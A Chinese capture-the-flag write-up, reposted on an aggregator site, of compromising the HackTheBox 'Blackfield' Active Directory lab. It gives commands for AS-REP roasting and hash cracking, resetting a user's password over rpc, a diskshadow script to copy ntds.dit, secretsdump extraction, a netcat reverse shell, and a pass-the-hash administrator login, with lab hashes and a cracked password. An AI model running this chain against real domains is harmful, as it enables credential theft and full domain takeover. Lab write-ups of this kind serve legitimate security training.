ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

HTB-Blackfield靶机测试记录

2020-09-01 09:00:25  阅读:688  来源: 互联网

标签:文件 HTB lsass ntds https dit 靶机 smb Blackfield


Nmap

访问下smb

挨个查看下 只有profiles里有数据

将文件挂载下来

mount -t cifs //10.10.10.192/profiles$ ./smb  -o username=root,password='',vers=2.0


tree查看了下,全是文件夹没有文件 ,猜测这儿想干啥,看这些文件夹名像是用户名

经参考后得知可以使用GetNPUsers.py来爆破,原文如下
Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking

保存文件夹名到文件

这儿有个问题,个人nmap及kali下的nmap都在扫描时未扫出靶机的AD域域名,但是看参考上是可以得到 Blackfield.local 这个AD域名的

接下来配置hosts

执行

找到一个support的TGT

$krb5asrep$23$support@BLACKFIELD.LOCAL:b2989b1ea7a99d226256e84ce5352401$ea0090e21eb0f9b88e1854a2aad015095b6422372337e0d5b06300ebf395918ed2fdeadd3637cfb83b5ad82c02fd7fc52289210cf98f0f414a2b3d5bfdff61f77d35e19d359d6a7f79aa18882366b970ef841ba6e7bf1ec2f21c71a8b97be452d8875a5fb47d56fb799db3314ee75d38dd16edbe4a9a9e44d599f7d3b96a8aa017276d5dbc081248b1f19e185f0b7e3beeb71f3a62744ea771b04f5f2e2163b249cd06a86fef907c44011248b4f6eab6356b651f42f490db6910eb7bc5d9c601cd1a2c8fe1e75e4f6d22d04ac24c0e552fd06ea55b70547905db8b4a3657525efb8d82ef32ff8b3aa222dc75e7fee1d81f05aa4e

保存上面代码到本地,使用hashcat解析
hashcat.exe -m 18200 -a 0 hash.txt rockyou.txt 结果是 #00^BlackKnight

rpcclient //10.10.10.192 -U support
枚举权限

有很多权限 ,尝试修改用户密码
https://malicious.link/post/2017/reset-ad-user-password-with-linux/

setuserinfo2 audit2020 23 'ASDqwe123'
登陆smb

下载lsass.zip ,解压后得到一个lsass.DMP文件

但是在使用mimikatz中查询密码时总是报错,百度说是破解lsass.dmp文件是需要系统内核版本一一对应的,nmap扫出的版本是2003,所以尝试在2003下查询仍然报错。。之后在win7 win10下查询和百度无果后。。放弃

参考后得 svc_backup 9658d1d1dcd9250115e2205d9f48400d

使用evil-winrm来获取shell

下载这两个文件并上传
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

导入模块

https://docs.datacore.com/WIK-WebHelp/VSS/DiskShadow_Commands_Example.htm
写入文件并上传

set context persistent nowriters#
add volume c: alias new1#
create#
expose %new1% z:#

cmd /c diskshadow /s disk_command.txt

Copy-FileSeBackupPrivilege z:\windows\ntds\ntds.dit .\ntds.dit

上传nc.exe ,并在本地主机nc侦听443,在靶机上反弹shell
reg save HKLM\SYSTEM C:\Users\svc_backup\Documents\tmp\system.hive


本机执行
secretsdump.py -ntds ntds.dit -system system.hive local

可以看到已经拿到administrator的hash了:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee

执行administrator shell
evil-winrm.rb -i 10.10.10.192 -U administrator -H aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee

参考:https://www.youtube.com/watch?v=atbfB6od5cw

标签:文件,HTB,lsass,ntds,https,dit,靶机,smb,Blackfield
来源: https://www.cnblogs.com/zongdeiqianxing/p/13594203.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有